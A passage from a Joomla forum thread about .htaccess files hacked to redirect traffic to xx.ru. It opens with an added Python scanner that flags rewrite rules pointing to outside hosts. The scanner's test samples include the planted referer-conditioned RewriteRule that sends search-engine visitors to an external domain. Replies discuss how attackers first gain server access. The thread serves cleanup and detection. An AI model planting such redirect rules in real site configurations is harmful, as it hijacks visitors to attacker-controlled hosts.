#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
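Pulling together what the thread describes (renegadeskone's RewriteRule to an outside host guarded by HTTP_REFERER code, the dozen extra .htaccess copies beyondthenet found in plugins/, administrator/ and images/, slewis1972's grep over the tree, and the self-protection block leolam quotes above), here is an added Python example that walks a site tree and reports, for every .htaccess it finds, any redirect to a host other than the site's own, whether that redirect is conditioned on the referer, and whether the file carries a `<Files>` block denying access to .hta* files. This is not code from the forum, from Joomla! or from any poster; the three sample files are constructed for the demo, the site hostname `example.com` is a placeholder, and recognising Apache 2.4's `Require all denied` alongside the 2.2 `deny from all` shown in the thread is my addition.

```python
"""Hunt for planted .htaccess redirects across a site tree (added example)."""
import os
import re
import tempfile
from urllib.parse import urlparse

REWRITE_RULE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)", re.I)
REFERER_COND = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}", re.I)
FILES_OPEN = re.compile(r"^<Files(?:Match)?\s+(.+?)\s*>$", re.I)
FILES_CLOSE = re.compile(r"^</Files(?:Match)?\s*>$", re.I)
# Apache 2.2 syntax as quoted in the thread, plus the 2.4 equivalent (assumption).
DENY_ALL = re.compile(r"^(deny\s+from\s+all|Require\s+all\s+denied)$", re.I)


def _names_htaccess(arg):
    """True when a <Files> argument targets .htaccess / .hta* files.
    Collapses the [Hh][Tt][Aa] idiom to plain letters so both forms quoted
    in the thread are recognised."""
    norm = re.sub(r"\[([A-Za-z])[A-Za-z]\]", r"\1", arg).lower()
    return "hta" in norm


def analyze_htaccess(text, site_host):
    """Return what one .htaccess does that matters for this incident."""
    findings = {"external_redirects": [], "referer_conditioned": False,
                "self_protected": False}
    in_block = hta_block = denies = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = FILES_OPEN.match(line)
        if m:
            in_block, hta_block, denies = True, _names_htaccess(m.group(1)), False
            continue
        if in_block:
            if FILES_CLOSE.match(line):
                findings["self_protected"] |= hta_block and denies
                in_block = False
            elif DENY_ALL.match(line):
                denies = True
            continue
        if REFERER_COND.match(line):
            findings["referer_conditioned"] = True
            continue
        m = REWRITE_RULE.match(line)
        if m:
            # Relative targets (index.php) have no hostname and are ignored.
            host = urlparse(m.group(2)).hostname
            if host and host.lower() != site_host.lower():
                findings["external_redirects"].append(m.group(2))
    return findings


def scan_tree(root, site_host):
    """Analyse every .htaccess below root; keys are POSIX-style relative paths."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report[rel] = analyze_htaccess(fh.read(), site_host)
    return report


def suspicious(report):
    """Paths whose .htaccess sends visitors to another host."""
    return sorted(p for p, f in report.items() if f["external_redirects"])


# Constructed samples, modelled on the symptom described in the thread.
ROOT_INFECTED = r"""
## Abbreviated Joomla!-style rules (constructed)
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index\.php
RewriteRule .* index.php [L]
## Planted block: only visitors arriving from a search engine are sent away
RewriteCond %{HTTP_REFERER} google [NC]
RewriteRule ^(.*)$ http://xx.ru/in.cgi?4 [R=301,L]
"""
PLUGINS_INFECTED = r"""
RewriteEngine On
RewriteRule ^(.*)$ http://xx.ru/in.cgi?4 [R=301,L]
"""
ADMIN_CLEAN = r"""
# Protect the htaccess file (second form quoted by leolam)
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
"""


def demo():
    """Build a throw-away site tree from the samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {".htaccess": ROOT_INFECTED,
                   "plugins/.htaccess": PLUGINS_INFECTED,
                   "administrator/.htaccess": ADMIN_CLEAN}
        for rel, body in samples.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, "example.com")


if __name__ == "__main__":
    for path, f in demo().items():
        print(path, f)
    print("redirecting:", suspicious(demo()))
```

Run `scan_tree("/home/XXX/public_html", "your-site.example")` on the real account root and anything listed by `suspicious()` is a file to restore from a clean copy; a root .htaccess with `self_protected` false is one that still serves its own contents to the web. As Webdongle points out further down the thread, this only finds the symptom: whatever script was dropped to write these files, and the access path used to drop it, still have to be found and closed.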

Webdongle
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Sun Apr 01, 2012 6:20 pm

But if someone gained access to the server via exploiting an old version of Joomla or extension or by 'snitching' the ftp details ... then they could soon remove that or replace the redirect ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

leolam
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Sun Apr 01, 2012 7:01 pm

If somebody has access then they can do anything from above root till root, or place anything even in the 'home' directory of the server. Those scenarios are not limited to hta-files

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

Webdongle
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Sun Apr 01, 2012 7:05 pm

leolam wrote:If somebody has access then they can do anything from above root till root, or place anything even in the 'home' directory of the server. Those scenarios are not limited to hta-files

...
That is not in dispute, my point is that it is not a new hack that is attacking the .htaccess. My point is that it is a script dropped onto the server after gaining access via any of the existing hacks.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

